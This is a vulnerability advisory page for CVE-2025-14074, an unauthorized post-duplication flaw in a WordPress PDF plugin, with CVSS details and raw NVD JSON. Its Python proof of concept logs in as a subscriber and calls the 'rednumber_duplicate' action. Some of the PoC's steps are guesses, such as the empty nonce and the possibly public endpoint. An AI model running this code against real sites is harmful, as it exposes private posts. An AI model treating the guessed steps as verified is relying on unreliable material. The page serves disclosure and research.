Security Vulnerability Report
中文
CVE-2025-14074 CVSS 4.3 MEDIUM

CVE-2025-14074

Published: 2025-12-12 10:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The PDF for Contact Form 7 + Drag and Drop Template Builder plugin for WordPress is vulnerable to unauthorized post duplication due to a missing capability check on the 'rednumber_duplicate' function in all versions up to, and including, 6.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to duplicate arbitrary posts, including password protected or private ones.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PDF for Contact Form 7 + Drag and Drop Template Builder <= 6.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-14074 PoC - WordPress PDF for Contact Form 7 Plugin Unauthorized Post Duplication # Target: WordPress site with vulnerable plugin version <= 6.3.3 def exploit_post_duplication(target_url, username, password, target_post_id): """ Exploit for CVE-2025-14074 This PoC demonstrates unauthorized post duplication via missing capability check Parameters: - target_url: Base URL of the WordPress site - username: WordPress subscriber-level account username - password: Password for the account - target_post_id: ID of the post to duplicate (can be private or password-protected) """ session = requests.Session() # Step 1: Login to WordPress as subscriber login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return None print("[+] Login successful as subscriber") # Step 2: Access target post page (where duplicate button is exposed) post_url = f"{target_url}/?p={target_post_id}" page_response = session.get(post_url) # Step 3: Extract nonce or trigger duplicate action # The plugin may expose the duplicate functionality via AJAX or direct link # Look for 'rednumber_duplicate' related elements # Step 4: Execute duplication via AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" duplicate_data = { 'action': 'rednumber_duplicate', 'post_id': target_post_id, 'nonce': '' # May not require nonce due to missing capability check } duplicate_response = session.post(ajax_url, data=duplicate_data) if duplicate_response.status_code == 200: print(f"[+] Post {target_post_id} duplicated successfully") print(f"[+] Response: {duplicate_response.text}") return duplicate_response.json() else: print(f"[-] Duplication failed with status: {duplicate_response.status_code}") return None # Alternative method: Direct duplication via plugin's backend endpoint def direct_duplicate_exploit(target_url, target_post_id): """ Direct exploitation if the duplicate function is accessible without authentication This may work if the plugin exposes the functionality publicly """ # Plugin backend endpoint (from trac reference) backend_url = f"{target_url}/wp-content/plugins/pdf-for-contact-form-7/backend/index.php" exploit_params = { 'action': 'rednumber_duplicate', 'post_id': target_post_id } response = requests.get(backend_url, params=exploit_params) if response.status_code == 200: print(f"[+] Successfully triggered duplication for post {target_post_id}") return True return False if __name__ == "__main__": # Configuration target = "http://vulnerable-site.com" user = "attacker" passwd = "password123" post_id = 123 # Can be private or password-protected post print("CVE-2025-14074 PoC - PDF for Contact Form 7 Unauthorized Duplication") print("=" * 70) exploit_post_duplication(target, user, passwd, post_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14074", "sourceIdentifier": "[email protected]", "published": "2025-12-12T10:15:48.703", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The PDF for Contact Form 7 + Drag and Drop Template Builder plugin for WordPress is vulnerable to unauthorized post duplication due to a missing capability check on the 'rednumber_duplicate' function in all versions up to, and including, 6.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to duplicate arbitrary posts, including password protected or private ones."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/pdf-for-contact-form-7/tags/6.3.2/backend/index.php#L697", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/pdf-for-contact-form-7/trunk/backend/index.php#L697", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416014%40pdf-for-contact-form-7&new=3416014%40pdf-for-contact-form-7&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0d00b50c-949a-4fd0-9eab-3555d263fcc7?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.